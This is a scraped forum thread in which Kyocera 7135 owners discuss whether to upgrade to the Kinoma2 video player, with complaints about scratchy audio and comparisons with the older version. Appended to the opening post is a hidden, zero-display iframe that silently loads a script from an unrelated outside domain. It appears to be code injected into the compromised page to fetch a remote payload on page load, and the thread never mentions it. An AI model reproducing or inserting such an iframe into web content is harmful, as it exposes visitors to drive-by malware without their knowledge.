+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: kinoma2

kinoma2

Hey...all you 7135 movie buffs...

How come no one is reviewing the new "Kinoma2"? I haven't even picked it up yet because a.) I have been too busy with other things and b.) it's $20.00 to upgrade provided you are a registered owner of Kinoma. $30.00 if you are new to Kinoma.

So boys and girls...let me know...should I upgrade???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dave

I upgraded over the weekend and it was worth it for me because KP2 now supports/encodes div files with sound. With KP1 I had to convert my div movie files into mpg then into pdb which took hours and hours for the entire process. Now it only takes apprx 1 1/2 hours to encode a full length movie. I find the sound still comes out mono on the 7135. There are new features with KP2 that I have not had the chance to try out yet such as changing the scale of the final output, etc.
    Understanding is the comprehension of knowledge; wisdom is the application of knowledge.

Scratchy Sound

I have downloaded the free demos and get very scratchy sound of my test conversions and their sample files.

The video is beautiful but I expected better on the sound. Is there any tricks to this that I am missing?

Re: kinoma2

Originally posted by dwdod
    So boys and girls...let me know...should I upgrade???
    I would like to know the answer to that question myself! I hadn't even heard about Kinoma2, until this thread.
    Please visit my picture site: Robert-O-Rama :)

I bought Kinoma last year when I had a Tungsten T. On the high-res screen w/OS 5, video is cool and practical. I had whole Simpsons episodes and a bunch of funny commercials on my SD card. I have client who manages multimedia production, he has his quicktime movies in Kinoma format to view easily (also a Tungsten).

On the 7135, video is another story. I found the sound quality poor (without headphones) and the low-res screen, while bright, doesn't move enough pixels to make watching it enjoyable.

Wait for the video iPod!

Brian
    Paper -> Apple Newton 110 -> PalmPilot Personal -> Palm V -> Palm Vx -> Sony Clie T615 -> Palm Tungsten T -> Kyocera 7135

I don't think the video is bad at all considering the fact it's on a phone screen, quite watchable. (I haven't compared to a Tungsten T though...)

The audio is horrible even with headphones/earpiece. I feel the audio is almost more important than the video quality. I would happily put up with lesser video quality with good clear audio. I'm not even asking for stereo...just no hissing/skipping/scratching noises during playback.

Originally posted by Glitz
    I don't think the video is bad at all considering the fact it's on a phone screen, quite watchable. (I haven't compared to a Tungsten T though...)

The audio is horrible even with headphones/earpiece. I feel the audio is almost more important than the video quality. I would happily put up with lesser video quality with good clear audio. I'm not even asking for stereo...just no hissing/skipping/scratching noises during playback.
    So far I haven't been persuaded that I'd gain anything by upgrading...are there any significant new features?
    Dave

"Steve" upgraded.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    "Steve" upgraded.
    Maybe "Steve" could get his @ss in here and tell his about it... or is he too good for us now? :anger :p :p

"Steve" upgraded.
    That's roughly equivalent to "Mikey Likes It"!!!
    Dave

Originally posted by Robert K.
    Maybe "Steve" could get his @ss in here and tell his about it... or is he too good for us now? :anger :p :p
    Heehee! I'll tell him. :BigKnife: Just had lunch with him today.
    ~'kito
    pdaPhoneHome Moderator

Heehee! I'll tell him.
    You do that. And I don't want to hear back from him through "his people". I want to hear it straight from the super-cera man himself... partly because I'm a bit concerned that none of us have heard from him since that "home theatre" project of yours... maybe you're keeping him locked in your basement or something! :p :p (hmmm... isn't that where the home theatre is? Can you lock me in your basement?? )

Just had lunch with him today.
    So, don't keep us in suspense. Did he sing the praises of Kinoma2 or not? Did he show you any examples of video on his 7135 that emphasizes any improvements over the original version?

Enquiring minds want to know...
    Dave

You guys are talking about the Kinoma "Player", not "Producer", right?

If so, yes, he downloaded the 2.0 "Player" and had it with him when we hooked up for lunch. I beamed him a clip and he beamed me a different clip and I had Kinoma 1.5.1 (or something) and he has 2.0.

There seemed to be a few cosmetic differences, but quality seemed the same. In fact we played the same clip starting at the exact time and they looked and sounded identical to us.

But I will try to get mister M.I.A. to show his face around here and elaborate in this thread.
    ~'kito
    pdaPhoneHome Moderator

Yep!

If so, yes, he downloaded the 2.0 "Player" and had it with him when we hooked up for lunch. I beamed him a clip and he beamed me a different clip and I had Kinoma 1.5.1 (or something) and he has 2.0.

There seemed to be a few cosmetic differences, but quality seemed the same. In fact we played the same clip starting at the exact time and they looked and sounded identical to us.

But I will try to get mister M.I.A. to show his face around here and elaborate in this thread.
    Just as I thought. Kinoma seems to be ignoring the needs of the 7135 community. hrummph!!!
    Dave

On a related subject -- Dose anyone have any ideas on how to convert a RealPalyer (rm) (video and audio) file to a format that can be used on the 7135? I have one Andy of Mayberry rm file -- the one where Barney says about Earnest T. Bass -- “He’s a Nut!” – those three words, with the video, can have quite an impact.

Thanks

Here's my face: :p

Markito's Kinoma 1.5.11? & the new Kinoma 2 both played the Finding Nemo trailer exactly the same. Same speed same sound

My copy of the pdb was on RAM and Markito's was on his SD and there was no difference.

My framerate test was 53 fps and markitos was 28fps if i recal right-- which is fine considering his was on a SD (sandisk 256)

As far as what looked different:
    Kinoma 2.0 has Blue buttons and a lil arrow with option to hide them so its just the movie on screen. The other difference i notices was the "Open URL" choice in the menu -- I haven't tried it yet becase the documentation says the video streaming is supported on OS 5, I don't have an Express plan and I don't have a URL of a Movie to play!

My big question was the sound -- picture looked great- probably good as it gets and was very acceptable, but SOUND, ugh.
    K2 had no improvements there, It possibly could have been the movie was encoded with low quality sound so it wouldnt be any different, but I don't have a high qual sound file to test... I will see if I can find one before we meet again markito, to see if we notice a difference.

I posted a question in the old Kinoma thread about the sound patches -- anybody use these? Kinoma says we need them (http://www.kinoma.com/faqplayer.html#19) but don't have them it it works fine.... does it make it better is what I want to know. Anybody using the patches care to comment?

If my sound works now... what the heck do these do? I am hesitant to install patches, espcially ones 6 months old.

Anybody have a high-sound-bitrate kinoma PDB Markito & I could test for the good of this thread?
    iPhone therefore iAm.

Originally posted by Robert K.
    You do that. And I don't want to hear back from him through "his people". I want to hear it straight from the super-cera man himself... partly because I'm a bit concerned that none of us have heard from him since that "home theatre" project of yours... maybe you're keeping him locked in your basement or something! :p :p (hmmm... isn't that where the home theatre is? Can you lock me in your basement?? )

HELP HELP -- I'm stuck in Markito's basement! I'm living off old popcorn kernals and dehumidifier water!

How you been Robert? Did you get Kinoma 2?

Anybody notice anymore 7135 encoding settings in Kinoma Producer 2?
    iPhone therefore iAm.

Originally posted by dwdod

Yep!

Just as I thought. Kinoma seems to be ignoring the needs of the 7135 community. hrummph!!! [/B]

I think the Docter is right ..... We need to bombard em with emails again!
    iPhone therefore iAm.

Originally posted by Steve
    Did you get Kinoma 2?
    Nope... not yet. I had been anxiously awaiting your recommendation. By now Kinoma 3 might be available :p :p

I'm doing great! Glad to see that you're back